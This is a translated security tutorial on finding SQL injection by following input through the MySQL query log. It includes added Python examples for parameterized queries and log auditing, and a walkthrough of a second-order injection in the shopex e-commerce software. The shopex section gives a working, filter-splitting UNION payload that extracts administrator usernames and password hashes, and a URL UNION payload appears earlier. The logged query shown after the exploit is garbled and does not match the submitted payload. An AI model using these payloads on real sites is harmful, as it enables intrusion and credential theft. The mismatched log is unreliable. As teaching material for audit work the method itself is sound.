Code auditing skills

0x01 Injection vulnerability overview

Injection is one of the most common security vulnerabilities in web applications. When a program does not filter user input, an attacker can submit malicious SQL fragments to the server; once the application receives them, the attacker's input is mistakenly executed as part of the original SQL query. The query logic of the program is changed, the SQL statement constructed by the attacker is executed, and an injection vulnerability results.

Through SQL injection an attacker can read sensitive information from the database or, using database features, carry out a series of malicious operations such as adding users and exporting files. SQL injection vulnerabilities in common website construction systems are therefore a serious risk. This article shares methods for finding SQL injection vulnerabilities; other web security vulnerabilities are not discussed for now.
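The mechanism described above (a parameter pasted into the statement as a bare integer, so anything after the digits becomes SQL) next to its hardened form, as an added example that is not part of the original article. It uses Python's built-in SQLite module instead of MySQL so that it runs offline; the schema, table and column names and the sample rows are constructed for the example and not taken from any real program. The article's probe value "1a" is rejected by the database engine in both variants, which is the kind of failure that only shows up in the query log when an application suppresses error output.

```python
import sqlite3

# Constructed in-memory schema standing in for the site's tables; the table and
# column names are assumptions for this example, not taken from any real program.
SCHEMA = """
CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, userpass TEXT);
INSERT INTO product VALUES (1, 'Widget');
INSERT INTO product VALUES (2, 'Gadget');
INSERT INTO user VALUES (1, 'admin', 'hash-placeholder');
"""


def make_db():
    """Return a fresh SQLite connection loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def product_vulnerable(conn, raw_id):
    """The pattern the article describes: the id parameter is concatenated into
    the statement as a bare integer, so anything after the digits becomes SQL."""
    sql = "SELECT name FROM product WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def product_parameterized(conn, raw_id):
    """Hardened form: the statement text is fixed and the value is bound as a
    parameter; input that is not an integer is rejected before any query runs."""
    if not raw_id.isdigit():
        raise ValueError("id must be an unsigned integer")
    rows = conn.execute("SELECT name FROM product WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]


def query_outcome(fn, conn, raw_id):
    """Summarise what a lookup does with a given input: 'rows:N' when it returns
    N rows, 'rejected' when the database engine or the validator raises an error."""
    try:
        return "rows:%d" % len(fn(conn, raw_id))
    except (sqlite3.Error, ValueError):
        return "rejected"


if __name__ == "__main__":
    db = make_db()
    tracer = "1a"  # the article's probe value: a digit followed by a letter
    union = "1 UNION SELECT username || '|' || userpass FROM user"
    for label, fn in (("concatenated", product_vulnerable),
                      ("parameterized", product_parameterized)):
        print(label, "id=1        ->", query_outcome(fn, db, "1"))
        print(label, "id=1a       ->", query_outcome(fn, db, tracer))
        print(label, "id=1 UNION  ->", query_outcome(fn, db, union))
```

With the concatenated version the UNION input returns two rows, one of them from the user table; the parameterized version returns the same single row for "1" and rejects everything else before the database sees it.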

0x02 Vulnerability mining ideas

We know that SQL injection vulnerabilities of this kind are easy to discover by auditing the source code. But what should we do when there is no source code to audit and we still want to find vulnerabilities? We need the right method. Here are some ideas on how to find them.

First, a good test environment is very important, so that the injection point can be located accurately in a short time. Before looking for injection vulnerabilities, enable the MySQL query log. Whether or not an injection has occurred can be seen most directly in this log.

Then use a text viewer to watch the log file and see the SQL statements executed by the website program (BareTail is used here).

The next step is to find the input points; this is the focus (and during this process the MySQL query log must be observed carefully).

For some input points the program does not filter the value and queries the database with it directly, which results in injection.

For example, submit with GET:

http://localhost/index2.php?id=1a

Search for 1a in the monitored MySQL log: the executed query contains id = 1a, so the input was passed through unprocessed,

and the parameter is used as an integer, outside of single quotes,

so a URL can be submitted to inject into it and retrieve any data.

http://localhost/index2.php?id=1%20union%20select%20user%28%29%20from%20user
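The log-following step of this section in code, as an added example that is not part of the original article: it parses MySQL general query log entries, reports whether a submitted tracer value (such as the article's 1a) reached a query and whether it landed inside or outside a string literal, and flags statements that carry injection signatures, which is the same log read from the defender's side. The sample log text is constructed for the example; the line layout follows the MySQL 5.7 and 8.0 general_log_file format (timestamp, tab, connection id, command, tab, argument, with multi-line statements continued on following lines), and the connection id, table names and tracer values are assumptions.

```python
import re

# Constructed sample of a MySQL general query log. The tracer values 1a, 74a
# and canary7x stand for probe strings submitted through web forms.
SAMPLE_LOG = """\
Time                 Id Command    Argument
2024-03-01T12:00:00.000001Z\t   12 Connect\tshop@localhost on shopdb using TCP/IP
2024-03-01T12:00:00.000002Z\t   12 Query\tSELECT * FROM product WHERE id = 1a
2024-03-01T12:00:01.000003Z\t   12 Query\tSELECT * FROM product WHERE name = 'canary7x'
2024-03-01T12:00:02.000004Z\t   12 Query\tSELECT * FROM product WHERE id = 1 union select user() from user
2024-03-01T12:00:03.000005Z\t   12 Query\tINSERT INTO fav (member_id, goods_id)
VALUES (5, '74a')
2024-03-01T12:00:04.000006Z\t   12 Quit\t
"""

# One log entry: optional timestamp, tab, connection id, command, tab, argument.
# Lines that do not match are continuations of the previous statement.
ENTRY_RE = re.compile(r"^(?P<ts>.*?)\t\s*(?P<cid>\d+)\s+(?P<cmd>\w+)\t(?P<arg>.*)$")


def parse_general_log(text):
    """Group raw log lines into entries; continuation lines extend the last argument."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"ts": m["ts"].strip(), "cid": int(m["cid"]),
                            "cmd": m["cmd"], "arg": m["arg"]})
        elif entries:
            entries[-1]["arg"] += "\n" + line
    return entries


def inside_string_literal(sql, idx):
    """True if position idx of sql lies inside a '...' or "..." literal.
    Handles backslash escapes and doubled quotes ('' inside a string)."""
    quote = None
    i = 0
    while i < idx:
        c = sql[i]
        if quote is None:
            if c in ("'", '"'):
                quote = c
        elif c == "\\":
            i += 1  # skip the escaped character
        elif c == quote:
            if i + 1 < len(sql) and sql[i + 1] == quote:
                i += 1  # doubled quote, still inside the literal
            else:
                quote = None
        i += 1
    return quote is not None


def find_tracer(entries, tracer):
    """Return (connection id, 'quoted'|'unquoted', statement) for every
    occurrence of the tracer in a Query entry."""
    hits = []
    for e in entries:
        if e["cmd"] != "Query":
            continue
        pos = e["arg"].find(tracer)
        while pos != -1:
            ctx = "quoted" if inside_string_literal(e["arg"], pos) else "unquoted"
            hits.append((e["cid"], ctx, e["arg"]))
            pos = e["arg"].find(tracer, pos + len(tracer))
    return hits


def injection_indicators(sql):
    """Tag a statement with the injection signatures it contains."""
    tags = []
    if re.search(r"\bunion\b(\s|/\*.*?\*/)*\bselect\b", sql, re.I):
        tags.append("union-select")       # union appended to the original query
    if "/**/" in sql:
        tags.append("comment-splice")     # empty comments used as separators
    for m in re.finditer(r"#|--\s", sql):
        if not inside_string_literal(sql, m.start()):
            tags.append("trailing-comment")  # rest of the statement cut off
            break
    return tags


def audit(text, tracers):
    """Where each tracer landed, plus every Query entry that looks like injection."""
    entries = parse_general_log(text)
    landed = {t: [ctx for _, ctx, _ in find_tracer(entries, t)] for t in tracers}
    flagged = [(e["cid"], injection_indicators(e["arg"])) for e in entries
               if e["cmd"] == "Query" and injection_indicators(e["arg"])]
    return landed, flagged


if __name__ == "__main__":
    landed, flagged = audit(SAMPLE_LOG, ["1a", "74a", "canary7x"])
    for tracer, contexts in landed.items():
        print("tracer %-9s reached the database as: %s" % (tracer, contexts or "not seen"))
    for cid, tags in flagged:
        print("connection %d: suspicious statement, indicators %s" % (cid, tags))
```

An "unquoted" hit is the case the article singles out: the value is used as a bare integer, so there is no quote to escape. A "quoted" hit still needs checking for quote filtering, and a tracer that is "not seen" either never reached the database or was transformed on the way. In production the indicator tags are the part worth alerting on, since the general log records the statement before it is executed, whether or not the application reports the resulting error.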


0x03 A shopex vulnerability instance

Take shopex as an example. Part of the shopex source code is encrypted; decryption is complicated and involves too many files, so a code audit would take a lot of time. With the method above, however, vulnerabilities can be identified easily.

Open the website, go to a product page and click "add to favorites"; look at the POST data. 75 is the ID of our product and is also an input point.

Change it to 74a and submit once. Following the SQL log, we can see the statement that is run.

This value is not filtered, and 74a has been written to the database successfully. If it is not filtered when it is read back out, a second-order injection results. Next, go to the member center page, which displays our favorite items during normal use.

Checking the database execution log at this point, 74a appears again, so there is a second-order injection.

Because the stored value is concatenated into the query, we construct the injection statement, split it into parts and submit them separately to bypass the filtering on the front page.

http://localhost/index.php?Member-SQL-ajaxAddFav.html

Replace the preceding product ID with the following, submitted in three parts:

0)/**/union/**
**/select 1,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(username,0x7c,userpass),26,listen,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,hour,minute,57,58,59,60,61,62,63,64,65,66,67,68,69,70,74,80,81/**
**/from sdb_operators limit 1%23

Then go to the member center page: the administrator information is displayed in the product favorites area.

Looking at the database log, the SQL statement executed at this point is:

Query select agoods.*, agimage.thumbnail from sdb_goods as agoods left join sdb_gimages as agimage on agoods.image_default = agimage.gimage_id where agoods.goods_id in (0)/**/union/**,**/select 1,20,21,concat(username,signature,userpass,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,75,76,77,78,79,80,81/**,**/from sdb_operators limit 1 #) limit 0,10

0x04 Summary

The semi-black-box testing process is:

Enable query logging -- find the input points -- follow the input in the log -- check whether it is used unfiltered -- construct an injection statement

The focus of this process is finding the input points and following the input information.

Input points are the entry points through which injection is carried out; we must be able to control these points effectively. Input points include:

1) Form submissions, mainly POST requests, but also GET requests.

2) URL parameters, mainly GET request parameters.

3) Cookie parameters.

4) Modifiable values in the HTTP request header, such as Referer and User-Agent.

5) A few marginal input points, such as some of the file information in a .jpg file.

Some programs handle errors in such a way that nothing is reported even when the SQL statement has an error. In that case the only way to judge is to monitor the SQL query log: once an injection occurs, it shows up there first.

With this method all the injection vulnerabilities in a program can be found without understanding its code. Patience and care are required.

Address: http://www.91ri.org/7818.html
